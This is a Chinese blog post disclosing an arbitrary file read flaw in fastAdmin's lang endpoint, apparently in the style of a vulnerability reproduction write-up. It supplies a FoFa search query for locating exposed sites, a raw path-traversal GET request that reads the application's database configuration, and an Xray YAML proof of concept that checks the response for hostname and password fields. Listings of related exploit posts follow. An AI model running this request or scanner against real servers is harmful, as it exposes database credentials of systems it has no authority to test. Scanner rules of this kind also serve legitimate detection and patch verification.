fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)

已于 2024-06-18 10:40:30 修改
阅读量1.2k 收藏 1
点赞数 10
文章标签: web安全 安全
于 2024-06-18 10:25:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WuYSec/article/details/139766056
版权

0x01 漏洞描述

fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架,旨在帮助开发者快速构建高效、灵活的后台管理系统。

fastAdmin存在任意文件读取漏洞,可直接读取数据库配置文件。

0x02 FoFa语句

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x03 漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

image-20240618101853801

Xray规则:

name: poc-yaml-fastadmin-lang-file-read
transport: http
rules:
  r0:
    request:
      method: GET
      path: /index/ajax/lang?lang=../../application/database
      follow_redirects: false
      headers:
        User-Agent: >-
          Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
          Gecko) Chrome/36.0.1985.143 Safari/537.36
    expression: >-
      response.status == 200 && response.body_string.contains("jsonpReturn") &&
      response.body_string.contains("hostname") &&
      response.body_string.contains("database") &&
      response.body_string.contains("password")
expression: r0()
detail:
  author: WuY1n
  links:
    - https://wx.zsxq.com/dweb2/index/group/51111528418224

0x04 知识星球

img

WuY1nSec
关注
FastAdmin后台开发框架 lang 任意文件读取漏洞复现
0xSec
06-17 2761
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】泛微OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞
alert['Hello World']
06-19 2221
泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
fastadmin(V1.0.0.20200506_beta) 前台 getshell(文件上传解析) 漏洞分析1
08-03
2、在 linux 下, is_file() 函数判可用于判断符号链接 3、在 linux 下, is_file 函数会受到权限的影响,当前用户权限不足或父目录
漏洞预警】FastAdmin框架任意文件读取漏洞
晚风不及你
06-11 2762
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞,攻击者利用此漏洞可以获取系统敏感信息。
Fastadmin 前台任意文件读取漏洞
最新发布
2301_77012231的博客
09-28 267
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
漏洞复现】FastAdmin——lang——任意文件读取漏洞
LongL_GuYu的博客
06-27 2873
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
(新接口)用友NC某接口存在任意文件读取漏洞-0day
weixin_43167326的博客
02-22 1665
用友NC是一款企业级ERP(企业资源计划)软件,它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块,适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性,可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发,具有跨平台、集成度高、业务流程自动化、信息共享等特点,能够有效提高企业的管理效率和降低成本,是众多企业的首选管理软件。。
FastAdmin 任意文件读取漏洞复现
网安小白
09-04 1019
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1060
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
任意文件读取下载漏洞
weixin_48712514的博客
05-19 1654
1. 任意文件读取 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 1:敏感信息泄露 2:目录穿越,目录穿透,目录遍历 任意文件读取与下载漏洞原理 1:从权限的角度来讲,读取与下载都是属于读权限 漏洞成因 不管是任意文件读取还是任意文件下载,触发漏洞的条件都是相同的 1:存在读取文件的函数(web应用开放了读取功能) 2:读取文件的路径客户端可控(完全控制) 3:没有对文件
任意文件读取与下载漏洞学习
不想当脚本小子的脚本小子
01-25 3994
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
CISCO ASA远程任意文件读取漏洞(CVE-2020-3452)复现
玄道的网安博客
07-30 3000
简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 影响版本 Cisco ASA 设备影响版本: <9.6.1 9.6 < 9.6.4.42 9.71 9.8
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞复现
tigerOrtiger的博客
07-24 6047
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞 0x01 前言 昨天深夜4点cisco asa 爆出了CVE-2020-3452漏洞,此漏洞可以在未验证的情况下进行任意文件读取。 然后今天早上各大漏洞平台中找各种POC。 但是都只有漏洞通告 于是去推特上一看,已经有大佬把poc公布出来了。 推特是个好东西 :) LOL 0x02 漏洞信息 根据ciso官方通报的信息来看,【入口: 官方信息】 该漏洞是由于受影响的设备处理的HTTP请求中的URL缺乏正确的输入验证所致。攻击者可以通过将
任意文件读取漏洞复现
来日可期的博客
08-31 4431
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
漏洞挖掘-从任意文件读取漏洞到获取账户利用
m0_60571990的博客
03-07 1258
漏洞挖掘-从任意文件读取漏洞到获取账户利用
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1888
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
fastadmin前台分片漏洞
Fiverya的博客
12-05 3465
参考链接:fastadmin安装fastadmin安装前台分片漏洞复现:https://blog.csdn.net/weixin_43288600/article/details/121192252https://blog.csdn.net/u013921288/article/details/117670844https://xz.aliyun.com/t/9395FastAdmin最新RCE漏洞复现https://www.secpulse.com/archives/157307.html搭建好环境后,查
Fastadmin后台插件-在线命令管理-getshell
dzqxwzoe的博客
02-20 2944
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
java yml文件读取failed to bind properties under to java.lang.boolean
06-01
这个错误通常是由于 YAML 文件中布尔类型的值与 Java 对应的布尔类型不匹配导致的。 例如,在 YAML 文件中,你可能设置了一个键值对: ``` is_enabled: "true" ``` 但是在 Java 代码中,你将 `is_enabled` 属性声明为布尔类型: ``` private boolean is_enabled; ``` 这时候,当 YAML 文件中的值被读取到 Java 对象中时,会尝试将字符串类型的 "true" 转换成 Java 的布尔类型,但是这个转换会失败,从而抛出 "failed to bind properties under to java.lang.boolean" 错误。 要解决这个问题,一种方法是在 YAML 文件中使用布尔类型的值,而不是字符串类型的值: ``` is_enabled: true ``` 另一种方法是在 Java 代码中将 `is_enabled` 属性声明为字符串类型,并在使用它时进行类型转换: ``` private String is_enabled; // ... boolean isEnabled = Boolean.parseBoolean(is_enabled); ``` 希望这些信息能对你有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值